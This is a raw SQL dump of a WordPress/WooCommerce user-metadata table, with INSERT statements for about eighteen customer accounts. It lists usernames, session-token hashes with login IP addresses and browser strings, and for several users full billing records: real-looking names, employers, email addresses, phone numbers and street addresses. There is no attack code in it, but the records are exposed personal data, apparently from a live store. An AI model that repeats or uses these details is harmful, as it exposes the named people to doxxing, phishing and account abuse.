INSERT INTO `wp_usermeta` VALUES (7691, 459, 'session_tokens', 'a:1:{s:64:"25f58e45e2d9a527f28dced5495cca23b7e25846c55dfacf3393084e348075bf";a:4:{s:10:"expiration";i:1488412062;s:2:"ip";s:13:"130.76.186.18";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1487202462;}}'); 
INSERT INTO `wp_usermeta` VALUES (7692, 460, 'nickname', 'patrick.willis-1'); 
INSERT INTO `wp_usermeta` VALUES (7693, 460, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7694, 460, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7695, 460, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7696, 460, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7697, 460, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7698, 460, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7699, 460, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7700, 460, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7701, 460, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7702, 460, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7703, 460, '_yoast_wpseo_profile_updated', '1487259336'); 
INSERT INTO `wp_usermeta` VALUES (7704, 460, 'session_tokens', 'a:1:{s:64:"63f3238fda3d3e8a07288d9acac543caab4d226a6fba7fcfc5dbffe765239540";a:4:{s:10:"expiration";i:1488468937;s:2:"ip";s:13:"130.134.35.95";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0";s:5:"login";i:1487259337;}}'); 
INSERT INTO `wp_usermeta` VALUES (7705, 456, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7706, 461, 'nickname', 'mlarsen'); 
INSERT INTO `wp_usermeta` VALUES (7707, 461, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7708, 461, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7709, 461, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7710, 461, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7711, 461, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7712, 461, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7713, 461, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7714, 461, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7715, 461, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7716, 461, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7717, 461, '_yoast_wpseo_profile_updated', '1487264666'); 
INSERT INTO `wp_usermeta` VALUES (7718, 461, 'session_tokens', 'a:1:{s:64:"04321607d35bc248d82ee01d85bbc235ba428a8b0f33fde5f0edaabfa866f0a1";a:4:{s:10:"expiration";i:1488474267;s:2:"ip";s:13:"65.120.208.98";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487264667;}}'); 
INSERT INTO `wp_usermeta` VALUES (7719, 461, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7720, 462, 'nickname', 'jonathan.fay'); 
INSERT INTO `wp_usermeta` VALUES (7721, 462, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7722, 462, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7723, 462, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7724, 462, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7725, 462, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7726, 462, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7727, 462, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7728, 462, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7729, 462, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7730, 462, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7731, 462, '_yoast_wpseo_profile_updated', '1487271494'); 
INSERT INTO `wp_usermeta` VALUES (7732, 462, 'session_tokens', 'a:1:{s:64:"5eba9781980dc06c27aa497c5683b9bc2d25b69e6220cd7681739143a3be030c";a:4:{s:10:"expiration";i:1488481095;s:2:"ip";s:13:"144.29.129.22";s:2:"ua";s:75:"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko";s:5:"login";i:1487271495;}}'); 
INSERT INTO `wp_usermeta` VALUES (7733, 462, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7734, 3, 'session_tokens', 'a:1:{s:64:"ddf16aebea3123b9d671978b8a03e6bceb95ff3d267e828ac1e096efa75a8447";a:4:{s:10:"expiration";i:1503580339;s:2:"ip";s:13:"198.0.163.155";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36";s:5:"login";i:1503407539;}}'); 
INSERT INTO `wp_usermeta` VALUES (7735, 463, 'nickname', 'michael.cochran'); 
INSERT INTO `wp_usermeta` VALUES (7736, 463, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7737, 463, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7738, 463, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7739, 463, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7740, 463, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7741, 463, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7742, 463, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7743, 463, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7744, 463, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7745, 463, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7746, 463, '_yoast_wpseo_profile_updated', '1487278587'); 
INSERT INTO `wp_usermeta` VALUES (7747, 463, 'session_tokens', 'a:1:{s:64:"f7953dfadc899f8bfd8805b0f8cd84fb97955ddbc7689f4a6fd86557b38d942b";a:4:{s:10:"expiration";i:1488488188;s:2:"ip";s:13:"166.20.224.11";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487278588;}}'); 
INSERT INTO `wp_usermeta` VALUES (7748, 464, 'nickname', 'douglas.howie'); 
INSERT INTO `wp_usermeta` VALUES (7749, 464, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7750, 464, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7751, 464, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7752, 464, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7753, 464, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7754, 464, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7755, 464, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7756, 464, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7757, 464, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7758, 464, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7759, 464, '_yoast_wpseo_profile_updated', '1487279132'); 
INSERT INTO `wp_usermeta` VALUES (7760, 464, 'session_tokens', 'a:1:{s:64:"14667037dd9e2d4f8abc0e41814ca72484cb10c2e1e941c9fd7c879dcdf1a469";a:4:{s:10:"expiration";i:1488488733;s:2:"ip";s:14:"66.150.218.172";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487279133;}}'); 
INSERT INTO `wp_usermeta` VALUES (7761, 465, 'nickname', 'Chuck.Denny'); 
INSERT INTO `wp_usermeta` VALUES (7762, 465, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7763, 465, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7764, 465, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7765, 465, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7766, 465, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7767, 465, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7768, 465, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7769, 465, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7770, 465, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7771, 465, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7772, 465, '_yoast_wpseo_profile_updated', '1487285848'); 
INSERT INTO `wp_usermeta` VALUES (7773, 465, 'session_tokens', 'a:1:{s:64:"af3654db07f4bb1f6b5368f40ae193e6fc5fbfa11e91184ee346998b74ae8096";a:4:{s:10:"expiration";i:1488495449;s:2:"ip";s:14:"192.234.122.28";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1487285849;}}'); 
INSERT INTO `wp_usermeta` VALUES (7774, 466, 'nickname', 'jayekonzjq5261'); 
INSERT INTO `wp_usermeta` VALUES (7775, 466, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7776, 466, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7777, 466, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7778, 466, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7779, 466, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7780, 466, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7781, 466, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7782, 466, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7783, 466, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7784, 466, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7785, 466, '_yoast_wpseo_profile_updated', '1487304747'); 
INSERT INTO `wp_usermeta` VALUES (7786, 466, 'session_tokens', 'a:1:{s:64:"e377a5965aec82488345c6f949785606de1951dc863628213f71c5ad8e5fb5f0";a:4:{s:10:"expiration";i:1488514348;s:2:"ip";s:15:"162.212.174.182";s:2:"ua";s:69:"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17";s:5:"login";i:1487304748;}}'); 
INSERT INTO `wp_usermeta` VALUES (7787, 466, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7789, 467, 'nickname', 'cbenson'); 
INSERT INTO `wp_usermeta` VALUES (7790, 467, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7791, 467, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7792, 467, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7793, 467, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7794, 467, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7795, 467, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7796, 467, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7797, 467, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7798, 467, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7799, 467, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7800, 467, '_yoast_wpseo_profile_updated', '1487342752'); 
INSERT INTO `wp_usermeta` VALUES (7801, 467, 'session_tokens', 'a:1:{s:64:"5ccdcb4edd31580b0877ed014ade07261d60310c3ca4687f4b1cbea08662222f";a:4:{s:10:"expiration";i:1488552353;s:2:"ip";s:13:"173.13.121.65";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0";s:5:"login";i:1487342753;}}'); 
INSERT INTO `wp_usermeta` VALUES (7802, 468, 'nickname', 'john.morse'); 
INSERT INTO `wp_usermeta` VALUES (7803, 468, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7804, 468, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7805, 468, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7806, 468, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7807, 468, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7808, 468, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7809, 468, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7810, 468, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7811, 468, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7812, 468, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7813, 468, '_yoast_wpseo_profile_updated', '1487346326'); 
INSERT INTO `wp_usermeta` VALUES (7814, 468, 'session_tokens', 'a:1:{s:64:"5b2d9b74e535c329f58ee486c3afe6c3c48b0e54c0ed0994bc220a1901c44e1a";a:4:{s:10:"expiration";i:1489684901;s:2:"ip";s:14:"199.133.51.228";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1489512101;}}'); 
INSERT INTO `wp_usermeta` VALUES (7815, 469, 'nickname', 'joe'); 
INSERT INTO `wp_usermeta` VALUES (7816, 469, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7817, 469, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7818, 469, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7819, 469, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7820, 469, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7821, 469, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7822, 469, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7823, 469, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7824, 469, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7825, 469, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7826, 469, '_yoast_wpseo_profile_updated', '1487363263'); 
INSERT INTO `wp_usermeta` VALUES (7828, 470, 'nickname', 'jbiglin'); 
INSERT INTO `wp_usermeta` VALUES (7829, 470, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7830, 470, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7831, 470, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7832, 470, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7833, 470, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7834, 470, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7835, 470, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7836, 470, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7837, 470, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7838, 470, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7839, 470, '_yoast_wpseo_profile_updated', '1487603117'); 
INSERT INTO `wp_usermeta` VALUES (7840, 470, 'session_tokens', 'a:1:{s:64:"1cd20b031cc5a5f025d2372e48dcc6907f3ef0687edff5589de7b5d95181ef4f";a:4:{s:10:"expiration";i:1488812718;s:2:"ip";s:12:"63.87.140.45";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1487603118;}}'); 
INSERT INTO `wp_usermeta` VALUES (7841, 470, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7842, 471, 'nickname', 'suzanne.walker-bell'); 
INSERT INTO `wp_usermeta` VALUES (7843, 471, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7844, 471, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7845, 471, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7846, 471, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7847, 471, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7848, 471, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7849, 471, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7850, 471, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7851, 471, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7852, 471, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7853, 471, '_yoast_wpseo_profile_updated', '1487627682'); 
INSERT INTO `wp_usermeta` VALUES (7854, 471, 'session_tokens', 'a:1:{s:64:"5f04345bc87fff956edf9b8193ab9b4d9fac2b3475ddf4b1b5b262babe2f040f";a:4:{s:10:"expiration";i:1488837283;s:2:"ip";s:14:"134.132.52.221";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487627683;}}'); 
INSERT INTO `wp_usermeta` VALUES (7855, 471, 'billing_first_name', 'Suzanne'); 
INSERT INTO `wp_usermeta` VALUES (7856, 471, 'billing_last_name', 'Walker-Bell'); 
INSERT INTO `wp_usermeta` VALUES (7857, 471, 'billing_company', ''); 
INSERT INTO `wp_usermeta` VALUES (7858, 471, 'billing_email', 'suzanne.walker-bell@halliburton.com'); 
INSERT INTO `wp_usermeta` VALUES (7859, 471, 'billing_phone', '8183767204'); 
INSERT INTO `wp_usermeta` VALUES (7860, 471, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (7861, 471, 'billing_address_1', '7652 Haskell Ave.,'); 
INSERT INTO `wp_usermeta` VALUES (7862, 471, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (7863, 471, 'billing_city', 'Van Nuys'); 
INSERT INTO `wp_usermeta` VALUES (7864, 471, 'billing_state', 'CA'); 
INSERT INTO `wp_usermeta` VALUES (7865, 471, 'billing_postcode', '91406'); 
INSERT INTO `wp_usermeta` VALUES (7866, 471, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7867, 472, 'nickname', 'mumu'); 
INSERT INTO `wp_usermeta` VALUES (7868, 472, 'first_name', 'MuMu'); 
INSERT INTO `wp_usermeta` VALUES (7869, 472, 'last_name', 'Moorthi'); 
INSERT INTO `wp_usermeta` VALUES (7870, 472, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7871, 472, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7872, 472, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7873, 472, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7874, 472, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7875, 472, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7876, 472, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7877, 472, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7878, 472, '_yoast_wpseo_profile_updated', '1487697735'); 
INSERT INTO `wp_usermeta` VALUES (7879, 472, 'session_tokens', 'a:1:{s:64:"7019147c3f984b7d495aab39d58d9fdbf75ec12a30d1204da91ab0332ff30e4c";a:4:{s:10:"expiration";i:1488907336;s:2:"ip";s:13:"99.72.205.179";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487697736;}}'); 
INSERT INTO `wp_usermeta` VALUES (7880, 472, 'billing_first_name', 'MuMu'); 
INSERT INTO `wp_usermeta` VALUES (7881, 472, 'billing_last_name', 'Moorthi'); 
INSERT INTO `wp_usermeta` VALUES (7882, 472, 'billing_company', 'Battery Consulting'); 
INSERT INTO `wp_usermeta` VALUES (7883, 472, 'billing_email', 'mumu@battery-consulting.com'); 
INSERT INTO `wp_usermeta` VALUES (7884, 472, 'billing_phone', '2149296790'); 
INSERT INTO `wp_usermeta` VALUES (7885, 472, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (7886, 472, 'billing_address_1', '506 Business Pkwy'); 
INSERT INTO `wp_usermeta` VALUES (7887, 472, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (7888, 472, 'billing_city', 'Richardson'); 
INSERT INTO `wp_usermeta` VALUES (7889, 472, 'billing_state', 'TX'); 
INSERT INTO `wp_usermeta` VALUES (7890, 472, 'billing_postcode', '75081'); 
INSERT INTO `wp_usermeta` VALUES (7891, 472, 'last_update', '1487697789'); 
INSERT INTO `wp_usermeta` VALUES (7892, 472, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7893, 473, 'nickname', 'ipineda'); 
INSERT INTO `wp_usermeta` VALUES (7894, 473, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7895, 473, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7896, 473, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7897, 473, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7898, 473, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7899, 473, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7900, 473, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7901, 473, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7902, 473, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7903, 473, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7904, 473, '_yoast_wpseo_profile_updated', '1487697981'); 
INSERT INTO `wp_usermeta` VALUES (7906, 473, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (7907, 474, 'nickname', 'jcarroll'); 
INSERT INTO `wp_usermeta` VALUES (7908, 474, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7909, 474, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7910, 474, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7911, 474, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7912, 474, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7913, 474, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7914, 474, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7915, 474, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7916, 474, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7917, 474, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7918, 474, '_yoast_wpseo_profile_updated', '1487698996'); 
INSERT INTO `wp_usermeta` VALUES (7919, 474, 'session_tokens', 'a:2:{s:64:"14028ae05811a4112557a11092df86a1d7f515187fcf4eee06b68709b3e31464";a:4:{s:10:"expiration";i:1488908597;s:2:"ip";s:11:"99.47.84.21";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36";s:5:"login";i:1487698997;}s:64:"686f80ed0dba7ff340994eada673cc69f0f80e9badb4efdfb734f980271813d3";a:4:{s:10:"expiration";i:1487971760;s:2:"ip";s:11:"99.47.84.21";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36";s:5:"login";i:1487798960;}}'); 
INSERT INTO `wp_usermeta` VALUES (7920, 475, 'nickname', 'ltopete.int'); 
INSERT INTO `wp_usermeta` VALUES (7921, 475, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7922, 475, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7923, 475, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7924, 475, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7925, 475, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7926, 475, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7927, 475, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7928, 475, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7929, 475, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7930, 475, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7931, 475, '_yoast_wpseo_profile_updated', '1487711322'); 
INSERT INTO `wp_usermeta` VALUES (7932, 475, 'session_tokens', 'a:1:{s:64:"2de39bdf7201f4418f9bd249bb20f467a7e1d6f310cf28b9d5d4b30d75ae419c";a:4:{s:10:"expiration";i:1488920923;s:2:"ip";s:13:"206.208.29.20";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1487711323;}}'); 
INSERT INTO `wp_usermeta` VALUES (7933, 476, 'nickname', 'davefischer'); 
INSERT INTO `wp_usermeta` VALUES (7934, 476, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7935, 476, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (7936, 476, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (7937, 476, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7938, 476, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (7939, 476, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (7940, 476, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (7941, 476, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (7942, 476, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (7943, 476, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (7944, 476, '_yoast_wpseo_profile_updated', '1487729453'); 
INSERT INTO `wp_usermeta` VALUES (7945, 476, 'session_tokens', 'a:1:{s:64:"210898a37ca59e269981f86f00b23ff8edb4c151b3c5886bd2371f9cd0a73ed9";a:4:{s:10:"expiration";i:1488939054;s:2:"ip";s:13:"66.41.185.237";s:2:"ua";s:119:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10";s:5:"login";i:1487729454;}}'); 
INSERT INTO `wp_usermeta` VALUES (7946, 476, 'billing_first_name', 'David'); 
INSERT INTO `wp_usermeta` VALUES (7947, 476, 'billing_last_name', 'Fischer'); 
INSERT INTO `wp_usermeta` VALUES (7948, 476, 'billing_company', 'Excalibur Driving School'); 
INSERT INTO `wp_usermeta` VALUES (7949, 476, 'billing_email', 'davefischer@excaliburdriving.com'); 
INSERT INTO `wp_usermeta` VALUES (7950, 476, 'billing_phone', '763-229-1457'); 
INSERT INTO `wp_usermeta` VALUES (7951, 476, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (7952, 476, 'billing_address_1', '2840 209th Lane NW'); 
INSERT INTO `wp_usermeta` VALUES (7953, 476, 'billing_address_2', ''); 
